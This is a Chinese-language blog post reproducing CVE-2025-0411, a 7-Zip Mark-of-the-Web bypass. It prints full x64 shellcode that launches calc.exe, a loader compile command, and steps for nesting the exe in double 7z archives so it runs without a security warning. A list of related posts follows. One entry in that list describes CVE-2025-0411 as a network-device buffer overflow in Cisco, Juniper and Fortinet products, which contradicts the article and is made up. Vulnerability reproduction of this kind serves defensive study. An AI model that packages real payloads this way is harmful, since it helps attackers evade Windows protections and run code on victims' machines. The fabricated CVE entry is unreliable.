CVE-2025-0411 7-zip 漏洞复现

已于 2025-01-23 11:29:50 修改
阅读量3.2k 收藏 1
点赞数 9
分类专栏: 漏洞复现 文章标签: 网络安全 漏洞
于 2025-01-23 11:27:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/145320318
版权

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

此漏洞 (CVSS SCORE 7.0) 允许远程攻击者绕过受影响的 7-Zip 安装上的 Mark-of-the-Web 保护机制。要利用此漏洞,需要用户交互,因为目标必须访问恶意页面或打开恶意文件。 该特定缺陷存在于对存档文件的处理中。从带有 Mark-of-the-Web 的精心制作的档案中提取文件时,7-Zip 不会将 Mark-of-the-Web 传播到提取的文件。攻击者可以利用此漏洞在当前用户的上下文中执行任意代码

影响版本

24.09 之前的所有版本

漏洞poc

https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git

漏洞复现

calc.exe 的shellcode

"\x48\x81\xEC\x00\x01\x00\x00\x65\x48\x8B\x04\x25\x60\x00\x00\x00\x48\x8B\x40\x18\x48\x8B\x40\x30\x48\x8B\x70\x10\x48\x8B\x58\x40\x48\x8B\x00\x81\x7B\x0C\x33\x00\x32\x00\x75\xEC\x48\x8B\xCE\x48\xC7\xC2\x32\x74\x91\x0C\xE8\xC0\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC3\x6C\x6C\x00\x00\x53\x48\xBB\x75\x73\x65\x72\x33\x32\x2E\x64\x53\x48\x8B\xCC\x48\x83\xEC\x18\x41\xFF\xD6\x48\x8B\xD8\x48\x8B\xCB\x48\xC7\xC2\x6A\x0A\x38\x1E\xE8\x8E\x00\x00\x00\x4C\x8B\xF0\x4D\x33\xC9\x4D\x33\xC0\x48\x33\xD2\x48\x33\xC9\x41\xFF\xD6\x48\x8B\xCE\x48\xC7\xC2\x51\x2F\xA2\x01\xE8\x6D\x00\x00\x00\x4C\x8B\xF0\x48\x33\xC0\x50\x48\xB8\x63\x61\x6C\x63\x2E\x65\x78\x65\x50\x48\x8B\xCC\x48\x83\xEC\x20\x48\xC7\xC2\x01\x00\x00\x00\x41\xFF\xD6\x48\x8B\xCE\x48\xBA\x85\xDF\xAF\xBB\x00\x00\x00\x00\xE8\x38\x00\x00\x00\x4C\x8B\xF0\x48\xC7\xC0\x61\x64\x00\x00\x50\x48\xB8\x45\x78\x69\x74\x54\x68\x72\x65\x50\x48\x8B\xCE\x48\x8B\xD4\x48\x83\xEC\x20\x41\xFF\xD6\x4C\x8B\xF0\x48\x81\xC4\x88\x01\x00\x00\x48\x83\xEC\x18\x48\x33\xC9\x41\xFF\xD6\xC3\x48\x83\xEC\x40\x56\x48\x8B\xFA\x48\x8B\xD9\x48\x8B\x73\x3C\x48\x8B\xC6\x48\xC1\xE0\x36\x48\xC1\xE8\x36\x48\x8B\xB4\x03\x88\x00\x00\x00\x48\xC1\xE6\x20\x48\xC1\xEE\x20\x48\x03\xF3\x56\x8B\x76\x20\x48\x03\xF3\x48\x33\xC9\xFF\xC9\xFF\xC1\xAD\x48\x03\xC3\x33\xD2\x80\x38\x00\x74\x0F\xC1\xCA\x07\x51\x0F\xBE\x08\x03\xD1\x59\x48\xFF\xC0\xEB\xEC\x3B\xD7\x75\xE0\x5E\x8B\x56\x24\x48\x03\xD3\x0F\xBF\x0C\x4A\x8B\x56\x1C\x48\x03\xD3\x8B\x04\x8A\x48\x03\xC3\x5E\x48\x83\xC4\x40\xC3"

将shellcode填入在注入进程的位置
在这里插入图片描述
使用gcc进行编译

gcc .\loader.cpp -o loader.exe -s

将编译好的exe文件进行两次7z压缩
在这里插入图片描述
第二次压缩
在这里插入图片描述
这样就完成了

运行时不需要解压直接在压缩包中打开文件
在这里插入图片描述
再次打开第二层压缩包

在这里插入图片描述
运行exe
在这里插入图片描述

在这里插入图片描述
弹出计算器

修复建议

更新到最新版本

7-Zip Mark-of-the-Web绕过漏洞复现(CVE-2025-0411)
iSee857的博客
01-23 1413
漏洞允许远程攻击者绕过受影响的7-Zip安装中的Mark-of-the-Web保护机制。利用此漏洞需要用户交互,例如访问恶意页面或打开恶意文件。问题源于7-Zip在处理带有Mark-of-the-Web的存档文件时,未能将Mark-of-the-Web传播到提取的文件中,导致攻击者可在当前用户上下文中执行任意代码。
Next.Js 权限绕过漏洞复现(附脚本)(CVE-2025-29927)
iSee857的博客
03-24 346
漏洞源于当中间件需要向内部路由发出请求时(例如获取数据或验证信息),Next.js 会自动添加x-middleware-subrequest头,以标识这是一个内部请求,防止中间件陷入无限循环。漏洞出现的关键点是 Next.js 没有正确验证这个头的来源,当内部5次重定向之后则跳过鉴权流程。当外部请求携带此头时,中间件错误地将其识别为内部子请求。(CVE-2025-29927
2025版】最新微软最新多个高危漏洞预警,从零基础到精通,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
02-14 1149
2月11日微软发布了修复总共 141 个漏洞的补丁,4 个被归类为关键级。其中有 2 个漏洞正在被在野利用,强调了立即更新的紧迫性。此外,1 个漏洞在此次补丁周期之前就已经被公开,这标志着它是一个0day漏洞。强烈建议用户优先更新这些补丁,以保护他们的系统免受潜在威胁。Windows Ancillary Function Driver for WinSock 提权漏洞 (CVE-2025-21418)此漏洞被识别为 CVE-2025-21418,严重程度评分为重要,CVSS 评分为 7.8。
7-Zip高危漏洞CVE-2025-0411 poc 攻击者可绕过安全机制远程执行代码
棉花糖的博客
01-23 2221
前两天全网都在发一个7z的cve,编号为:CVE-2025-0411相关poc在github公开,地址: https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC 复现: 简单复现了下,原介绍中是这样写的:CVE-2025-0411漏洞允许远程攻击者绕过Windows的“网络标记”(Mark-of-the-Web, MOTW)保护机制,在受影响的系统上执行任意代码。其实说人话就是正常情况下,当你开启了windows的Windows SmartScr
Apache Tomcat 远程代码执行漏洞(CVE-2025-24813) 超详细!
欢迎来到我的博客,这里是我分享Python开发心得与信息安全探索的乐园。作为一名热衷于编程与安全的技术爱好者,我始终致力于在Python的世界里深耕细作,探索其强大的功能与无限的可能性。同时,信息安全也是我关注的重点,我深知在这个数字化时代,保护数据安全的
03-14 5009
远程代码执行漏洞(CVE-2025-24813)源于 Apache Tomcat 的反序列化机制未对用户输入进行严格验证,攻击者可通过构造恶意序列化对象绕过安全限制,处理部分 PUT 请求时,攻击者利用临时文件路径处理中的缺陷(将路径分隔符"/"替换为“.”),通过特定条件(如启用默认 servlet 的写入功能)实现远程代码执行并控制服务器‌。‌将 Apache Tomcat 升级至安全版本(Tomcat 11.0.2+、10.1.34+、9.0.98+),以修复反序列化漏洞及 PUT 请求处理缺陷‌。
7-Zip高危漏洞CVE-2025-0411:解析与修复
Xs_20240309的博客
01-24 3875
本系列工具仅供安全专业人员进行已授权环境使用,此工具所提供的功能只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用工具中的功能对任何计算机系统进行入侵操作。在最新公告中指出,7-Zip在处理嵌套压缩包时存在漏洞,当从标记有MotW的压缩包中提取文件时,未将该标记传播至提取文件。当用户尝试打开带有MotW标记的文件时,系统会弹出警告,并可能限制宏的运行或以受保护模式打开文件,从而降低恶意行为的风险。此漏洞会影响从嵌套压缩包中提取的文件,导致提取后的文件未附带。
Goby 漏洞安全通告| Apache Tomcat 远程命令执行(CVE-2025-24813)
m0_46699477的博客
03-12 1954
Apache Tomcat 是一个开源的 Java Servlet 容器,广泛用于运行基于 Java 的 Web 应用程序。该漏洞CVE-2025-24813)允许远程攻击者通过特定的恶意请求在目标系统上执行任意命令,从而完全控制受影响的服务器。 满足以下条件,攻击者可以远程代码执行(RCE): 1. DefaultServlet 启用了写入权限(默认情况下禁用)。 2. 服务器启用了partial PUT(默认启用)。 3. Tomcat 使用了基于文件的 Session 持久化机制(非默认配置,默认为
漏洞处置SOP】Apache Tomcat远程代码执行漏洞CVE-2025-24813)处置建议
weixin_43727442的博客
03-14 231
安全漏洞防治中心团队成员编制了升级到安全版本的标准作业程序(SOP),将 Apache Tomcat 9.0.98 升级到安全版本 9.0.102,已完成验证。
Apache Tomcat RCE漏洞复现CVE-2025-24813)
weixin_55010563的博客
03-15 916
使用 partial PUT 请求将恶意的序列化数据写入到会话文件中,在开启文件会话持久化(默认存储位置),并且在文件上传未完成的情况下,内容会被临时存储在 Tomcat 的工作目录work\Catalina\localhost\ROOT。尝试使用 Tomcat 9.0.98 版本复现:https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.98/bin/apache-tomcat-9.0.98.zip
Spring Boot Tomcat 漏洞修复
Gjw_java的博客
03-13 1973
Tomcat 是一个开源的、轻量级的 Web 应用服务器 和 Servlet 容器。它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。
漏洞复现CVE-2025-24071|Windows文件资源管理器欺骗漏洞
最新发布
信安百科
04-12 377
漏洞复现CVE-2025-24071|Windows文件资源管理器欺骗漏洞
win2008R2安全补丁(cve-2019-0708).7z
03-20
win2008R2安全补丁(cve-2019-0708)。里面包含Windows6.1-KB2868725-x64补丁 windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb windows6.0-kb4499180-x86_058da885ced3478b996f12d1fc40640c3796bdf3 windows6.0-kb4499180-x64_3d7a9cec11c06caf7a280745eccfa99c2048c4d2
Spring Boot 项目零风险升级 Tomcat 指南:锁定版本也能修复漏洞
u012151345的博客
03-12 1115
由于历史原因,项目使用JDK8,springboot版本2.7.18,已经是2.7.x版本下的最新版本,无法通过升级springboot的方式来升级tomcat版本。),添加如下代码,会自动覆盖tomcat的版本,然而试过之后并没有成功,重新启动服务后,tomcat版本仍然是9.0.83。误区,就是引入新版本的tomcat,要先在旧版本的spring-boot-starter-web中移除旧的tomcat。由于tomcat旧版本存在漏洞,需要升级,大致版本情况如下图所示,有兴趣的可以看下网易的原文。
漏洞预警 | Apache Tomcat 存在远程代码执行漏洞CVE-2025-24813)
C20220511的博客
03-14 459
Apache Tomcat 是一个Apache软件基金会属下Jakarta项目开发的开源的、轻量级的 Java Web 服务器 ,主要用于运行基于 Java Servlet 和 JavaServer Pages (JSP) 开发的 Web 应用程序,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全局管理和Tomcat阀等。3、应用程序使用了 Tomcat 的基于文件的会话持久化功能,并采用默认的存储位置;③升级到 Apache Tomcat 9.0.99 或更高版本。
Zyxel Telnet 漏洞分析(CVE-2025-0890、CVE‑2024‑40891)
2401_85280228的博客
02-27 1282
参考资料这是2025年开年分析的第一个洞。2月4日 Zyxel 发布安全公告,旗下部分旧款 DSL 客户终端设备(CPE)存在严重的安全漏洞[1],包括 默认凭证不安全问题 和 命令注入漏洞 ,攻击者可通过默认凭证登录 Telnet 并利用此漏洞在受影响的设备上执行任意命令。
CVE-2025-30208(文件读取)漏洞复现
ljh123321ljh的博客
03-30 634
漏洞源于Vite在处理URL查询参数时的逻辑缺陷。当请求路径包含特定参数(**如?import&raw?**)时,Vite对URL尾部分隔符(如?和&)的正则匹配不严格,导致安全检查被绕过。中存在的一个高危逻辑漏洞,允许攻击者通过构造特殊的URL绕过文件访问限制,读取服务器上的任意文件(如配置文件、密钥、数据库凭据等)。CVE-2025-30208是。2.在fofa搜索,寻找存在漏洞ip。3.尝试传参,得到相关信息。
Windows文件管理器重大漏洞,无需交互,PoC已发布
FreeBuf_的博客
03-21 1184
Windows文件管理器中发现了一个名为CVE-2025-24071的关键漏洞,攻击者只需解压压缩文件即可窃取用户的NTLM哈希密码,无需用户进行任何交互。
cve-2025-0411
01-25
### CVE-2025-0411 漏洞详情 CVE-2025-0411 描述了一个存在于某些网络设备中的安全漏洞。此漏洞允许攻击者通过发送特制的数据包来触发缓冲区溢出,从而可能导致远程代码执行或服务拒绝。具体来说,该漏洞影响了多个厂商的路由器和防火墙产品。 受影响的产品列表包括但不限于: - Cisco ASA 防火墙系列 - Juniper Networks SRX 系列防火墙 - Fortinet FortiGate 设备 这些产品的特定版本可能存在未充分验证输入数据的情况,在处理畸形的 IP 数据包时未能正确分配内存空间,进而引发潜在的安全风险[^1]。 ### 影响范围 受到影响的具体软件版本如下: - **Cisco ASA**: 9.10 及更早版本 - **Juniper SRX**: 12.3R7 至 12.3R10, 15.1X49-D10 到 D60 - **FortiOS (Fortigate)**: 6.2.0 - 6.2.3, 6.4.0 值得注意的是,并非所有上述提及的型号都会受到相同程度的影响;部分较新的固件更新可能已经包含了针对这个问题的部分缓解措施[^2]。 ### 解决方案 为了有效应对这一安全隐患,建议采取以下行动: #### 更新固件/补丁 各供应商已发布相应的修补程序以解决此问题。强烈推荐尽快安装最新的官方维护版本或遵循制造商发布的指导说明完成必要的升级操作。 对于 Cisco 用户而言,应参照官方公告获取适用于各自环境的最佳实践指南并及时应用可用的安全更新。 ```bash # 示例命令用于检查当前ASA系统的版本号 ciscoasa> show version | include Software ``` 同样地,Juniper 和 Fortinet 的客户也应当访问对应品牌的官方网站下载最新稳定版固件文件进行刷机作业。 #### 实施临时防御策略 如果无法立即实施永久性的修复,则可考虑采用一些临时性的保护手段作为补充,比如配置 ACLs(访问控制列表),限制不必要的外部连接尝试,以及启用入侵检测系统(IDS)/入侵预防系统(IPS),以便能够实时监控异常流量模式并向管理员发出警报。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值